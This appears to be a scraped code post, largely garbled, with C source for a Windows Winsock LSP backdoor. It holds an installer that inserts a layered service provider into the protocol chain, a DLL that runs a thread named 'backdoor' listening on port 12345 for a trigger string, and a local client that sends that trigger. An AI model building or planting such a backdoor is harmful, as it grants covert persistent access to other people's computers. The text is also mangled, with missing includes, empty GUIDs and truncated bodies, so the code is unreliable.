code:
1.instbd.exe的源**
#define unicode
#define _unicode
#include
#include
#include
#include
#include
guid filterguid=};
guid filterchainguid=};
bool getfilter();
void freefilter();
void installfilter();
void removefilter();
void start();
void usage();
int totalprotos=0;
dword protoinfosize=0;
lpwsaprotocol_infow protoinfo=null;
int main(int argc,char *argv)
else if(!strcmp(argv[1],"-remove"))
}
usage();
return 0; }
bool getfilter()
}
if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
printf("found %d protocols!/n",totalprotos);
return true; }
void freefilter()
void installfilter()
}
tcpchaininfo.protocolchain.chainlen++;
tcpchaininfo.protocolchain.chainentries[0]=iplayercataid;
memcpy(&chainarray[provcnt++],&tcpchaininfo,sizeof(wsaprotocol_infow)); }
if(wscinstallprovider(&filterchainguid,filter_path,chainarray,provcnt,&errorcode)==socket_error)
freefilter();
getfilter();
if((cataentries=(lpdword)globalalloc(gptr,totalprotos*sizeof(wsaprotocol_infow)))==null)
cataindex=0;
for(i=0;i
#include
#include
guid filterguid=};
lpwsaprotocol_infow protoinfo=null;
wspproc_table nextproctable;
dword protoinfosize=0;
handle hmutex;
handle hthread;
point nowpt;
int totalprotos=0;
dword winapi backdoor(lpvoid)
if((sock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=htons(inaddr_any);
sin.sin_family=af_inet;
sin.sin_port=htons(12345);
if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if(listen(sock,5)==socket_error)
while(1)
if((iret==recv(sockt,msg,sizeof(msg),0))==socket_error)
if(strstr(msg,"i am too2y"))
}
outputdebugstring(_t("transport successfully"));
closesocket(sockt); }
return 1; }
bool getfilter()
}
if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
return true; }
void freefilter()
bool winapi dllmain(hinstance hmodule,
dword reason,
lpvoid lpreserved)
releasemutex(hmutex);
break; }
case dll_process_detach:
releasemutex(hmutex);
closehandle(hthread);
break; }
}
return true; }
int wspapi wspstartup(
word wversionrequested,
lpwspdata lpwspdata,
lpwsaprotocol_infow lpprotoinfo,
wspupcalltable upcalltable,
lpwspproc_table lpproctable)
getfilter();
for(i=0;iprotocolchain.chainlen;i++)
}
filterpathlen=max_path;
filterpath=(tchar*)globalalloc(gptr,filterpathlen);
for(i=0;i
#include
#include
int main()
if((sock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=inet_addr("127.0.0.1");
sin.sin_family=af_inet;
sin.sin_port=htons(12345);
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if((iret=send(sock,msg,sizeof(msg),0))==socket_error)
memset(msg,0,sizeof(msg));
if((iret=recv(sock,msg,sizeof(msg),0))==socket_error)
printf("re: ");
printf(msg);
closesocket(sock);
wsacleanup();
getche();
return 0; }